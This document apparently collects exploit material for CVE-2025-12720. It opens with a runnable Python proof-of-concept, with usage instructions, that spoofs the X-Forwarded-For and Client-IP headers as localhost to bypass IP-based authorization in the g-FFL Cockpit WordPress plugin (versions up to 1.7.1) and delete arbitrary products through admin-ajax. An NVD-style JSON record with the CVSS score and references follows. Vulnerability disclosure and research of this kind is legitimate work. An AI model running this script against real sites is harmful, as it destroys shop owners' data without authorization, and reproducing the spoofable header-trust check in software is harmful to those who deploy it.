CVE-2025-12720

import requests import sys # CVE-2025-12720 PoC - Unauthorized Product Deletion # Target: WordPress site with g-FFL Cockpit plugin <= 1.7.1 def exploit(target_url, product_id): """ Exploit IP-based authorization bypass in g-FFL Cockpit plugin The handle_enqueue_only() function trusts X-Forwarded-For header """ # Target endpoint for product deletion endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Craft headers to spoof trusted IP headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'X-Forwarded-For': '127.0.0.1', # Spoof as localhost 'Client-IP': '127.0.0.1', 'Content-Type': 'application/x-www-form-urlencoded' } # Action to trigger handle_enqueue_only() data = { 'action': 'gffl_handle_enqueue_only', 'product_id': product_id, 'operation': 'delete' } try: print(f"[*] Sending exploit request to {target_url}") print(f"[*] Targeting product ID: {product_id}") response = requests.post(endpoint, headers=headers, data=data, timeout=30) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[*] Response: {response.text[:500]}") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-12720.py <target_url> <product_id>") print("Example: python cve-2025-12720.py http://target.com 123") sys.exit(1) target = sys.argv[1] pid = sys.argv[2] exploit(target, pid)

{"cve": {"id": "CVE-2025-12720", "sourceIdentifier": "[email protected]", "published": "2025-12-06T06:15:50.730", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The g-FFL Cockpit plugin for WordPress is vulnerable to unauthorized modification of data due to IP-based authorization that can be spoofed in the handle_enqueue_only() function in all versions up to, and including, 1.7.1. This makes it possible for unauthenticated attackers to delete arbitrary products."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://github.com/d0n601/CVE-2025-12720", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/g-ffl-cockpit/trunk/includes/class-update-processor.php#L634", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3413768/", "source": "[email protected]"}, {"url": "https://ryankozak.com/posts/cve-2025-12720/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3405974d-cf0a-4fef-9693-5d81833f42d6?source=cve", "source": "[email protected]"}]}}